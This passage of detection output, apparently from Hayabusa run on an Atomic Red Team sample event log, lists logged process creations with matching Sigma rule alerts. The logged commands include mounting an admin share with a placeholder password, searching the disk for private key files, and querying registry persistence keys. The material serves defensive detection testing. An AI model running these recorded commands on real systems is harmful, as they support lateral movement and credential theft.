747F3D96-D849-5D31-0000-0010914D2F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:48:41.050 +09:00,MSEDGEWIN10,1,low,Disc,Suspicious Listing of Network 
Connections,,rules/sigma/process_creation/proc_creation_win_susp_network_listing_connections.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:48:41.085 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd.exe /c net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""cmd.exe /c "" net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator | LID: 0x50951 | PID: 3284 | PGUID: 747F3D96-D849-5D31-0000-0010E54F2F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:48:41.085 +09:00,MSEDGEWIN10,1,low,Disc,Suspicious Listing of Network Connections,,rules/sigma/process_creation/proc_creation_win_susp_network_listing_connections.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:48:41.109 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator | Process: C:\Windows\System32\net.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd.exe /c net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator | LID: 0x50951 | PID: 6068 | PGUID: 747F3D96-D849-5D31-0000-00103C522F00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:48:41.109 +09:00,MSEDGEWIN10,1,medium,LatMov,Mounted Windows Admin Shares with net.exe,,rules/sigma/process_creation/proc_creation_win_net_use_admin_share.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:48:41.109 +09:00,MSEDGEWIN10,1,low,Disc,Suspicious Listing of Network 
Connections,,rules/sigma/process_creation/proc_creation_win_susp_network_listing_connections.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:48:46.238 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1628 | PGUID: 747F3D96-D84E-5D31-0000-00102C702F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:48:57.466 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""echo "" ""ATOMICREDTEAM > %%windir%%\cert.key"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6524 | PGUID: 747F3D96-D859-5D31-0000-0010E68C2F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:48:57.466 +09:00,MSEDGEWIN10,1,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:48:57.524 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""dir c:\ /b /s .key | findstr /e .key"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 888 | PGUID: 747F3D96-D859-5D31-0000-0010FB8F2F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:48:57.524 +09:00,MSEDGEWIN10,1,medium,CredAccess,Discover Private 
Keys,,rules/sigma/process_creation/proc_creation_win_discover_private_keys.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:48:57.524 +09:00,MSEDGEWIN10,1,low,Disc,Suspicious DIR Execution,,rules/sigma/process_creation/proc_creation_win_susp_dir.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:48:57.557 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\system32\cmd.exe /S /D /c"" dir c:\ /b /s .key "" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""dir c:\ /b /s .key | findstr /e .key"" | LID: 0x50951 | PID: 6220 | PGUID: 747F3D96-D859-5D31-0000-001045922F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:48:57.557 +09:00,MSEDGEWIN10,1,medium,CredAccess,Discover Private Keys,,rules/sigma/process_creation/proc_creation_win_discover_private_keys.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:48:57.557 +09:00,MSEDGEWIN10,1,low,Disc,Suspicious DIR Execution,,rules/sigma/process_creation/proc_creation_win_susp_dir.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:48:57.570 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: findstr /e .key | Process: C:\Windows\System32\findstr.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""dir c:\ /b /s .key | findstr /e .key"" | LID: 0x50951 | PID: 948 | PGUID: 747F3D96-D859-5D31-0000-00109E932F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:48:57.570 +09:00,MSEDGEWIN10,1,medium,CredAccess,Discover 
Private Keys,,rules/sigma/process_creation/proc_creation_win_discover_private_keys.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:49:31.690 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3188 | PGUID: 747F3D96-D87B-5D31-0000-0010D92D3100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:49:32.150 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2888 | PGUID: 747F3D96-D87C-5D31-0000-0010E83B3100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:49:32.180 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows | LID: 0x50951 | PID: 5348 | PGUID: 747F3D96-D87C-5D31-0000-0010413E3100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:49:32.180 +09:00,MSEDGEWIN10,1,low,Disc,Query Registry,,rules/sigma/process_creation/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:49:32.227 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: 
""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5984 | PGUID: 747F3D96-D87C-5D31-0000-00107A403100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:49:32.249 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce"" | LID: 0x50951 | PID: 5256 | PGUID: 747F3D96-D87C-5D31-0000-0010CC423100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:49:32.249 +09:00,MSEDGEWIN10,1,low,Disc,Query Registry,,rules/sigma/process_creation/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:49:32.304 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5016 | PGUID: 747F3D96-D87C-5D31-0000-001009453100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:49:32.335 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" 
/c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce"" | LID: 0x50951 | PID: 6208 | PGUID: 747F3D96-D87C-5D31-0000-00105B473100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:49:32.335 +09:00,MSEDGEWIN10,1,low,Disc,Query Registry,,rules/sigma/process_creation/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:49:32.389 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1680 | PGUID: 747F3D96-D87C-5D31-0000-001097493100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:49:32.413 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices"" | LID: 0x50951 | PID: 3680 | PGUID: 747F3D96-D87C-5D31-0000-0010E94B3100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:49:32.413 +09:00,MSEDGEWIN10,1,low,Disc,Query Registry,,rules/sigma/process_creation/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:49:32.463 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query 
HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1428 | PGUID: 747F3D96-D87C-5D31-0000-0010264E3100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:49:32.497 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices"" | LID: 0x50951 | PID: 3220 | PGUID: 747F3D96-D87C-5D31-0000-001078503100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:49:32.497 +09:00,MSEDGEWIN10,1,low,Disc,Query Registry,,rules/sigma/process_creation/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:49:32.551 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4016 | PGUID: 747F3D96-D87C-5D31-0000-0010B4523100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:49:32.585 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\SOFTWARE\Microsoft\Windows 
NT\CurrentVersion\Winlogon\Notify"" | LID: 0x50951 | PID: 5024 | PGUID: 747F3D96-D87C-5D31-0000-001006553100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:49:32.585 +09:00,MSEDGEWIN10,1,low,Disc,Query Registry,,rules/sigma/process_creation/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:49:32.660 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2440 | PGUID: 747F3D96-D87C-5D31-0000-00103F573100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:49:32.678 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit"" | LID: 0x50951 | PID: 4360 | PGUID: 747F3D96-D87C-5D31-0000-001080593100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:49:32.678 +09:00,MSEDGEWIN10,1,low,Disc,Query Registry,,rules/sigma/process_creation/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:49:32.728 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows 
NT\CurrentVersion\Winlogon\\Shell"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 956 | PGUID: 747F3D96-D87C-5D31-0000-0010CA5B3100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:49:32.743 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell"" | LID: 0x50951 | PID: 3608 | PGUID: 747F3D96-D87C-5D31-0000-00101D5E3100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:49:32.743 +09:00,MSEDGEWIN10,1,low,Disc,Query Registry,,rules/sigma/process_creation/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:49:32.789 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6832 | PGUID: 747F3D96-D87C-5D31-0000-001056603100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:49:32.807 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows 
NT\CurrentVersion\Winlogon\\Shell"" | LID: 0x50951 | PID: 6436 | PGUID: 747F3D96-D87C-5D31-0000-0010A8623100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:49:32.807 +09:00,MSEDGEWIN10,1,low,Disc,Query Registry,,rules/sigma/process_creation/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:49:32.850 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5936 | PGUID: 747F3D96-D87C-5D31-0000-0010E1643100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:49:32.868 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad"" | LID: 0x50951 | PID: 7144 | PGUID: 747F3D96-D87C-5D31-0000-001033673100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:49:32.868 +09:00,MSEDGEWIN10,1,low,Disc,Query Registry,,rules/sigma/process_creation/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:49:32.921 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query 
HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1740 | PGUID: 747F3D96-D87C-5D31-0000-00107C693100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:49:32.937 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce"" | LID: 0x50951 | PID: 644 | PGUID: 747F3D96-D87C-5D31-0000-0010C86B3100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:49:32.937 +09:00,MSEDGEWIN10,1,low,Disc,Query Registry,,rules/sigma/process_creation/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:49:32.975 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4220 | PGUID: 747F3D96-D87C-5D31-0000-0010056E3100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:49:32.990 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx"" | LID: 
0x50951 | PID: 6620 | PGUID: 747F3D96-D87C-5D31-0000-001057703100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:49:32.990 +09:00,MSEDGEWIN10,1,low,Disc,Query Registry,,rules/sigma/process_creation/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:49:33.036 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 196 | PGUID: 747F3D96-D87D-5D31-0000-001090723100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:49:33.059 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run"" | LID: 0x50951 | PID: 3172 | PGUID: 747F3D96-D87D-5D31-0000-0010E2743100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:49:33.059 +09:00,MSEDGEWIN10,1,low,Disc,Query Registry,,rules/sigma/process_creation/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:49:33.147 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | 
LID: 0x50951 | PID: 2148 | PGUID: 747F3D96-D87D-5D31-0000-00102B773100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
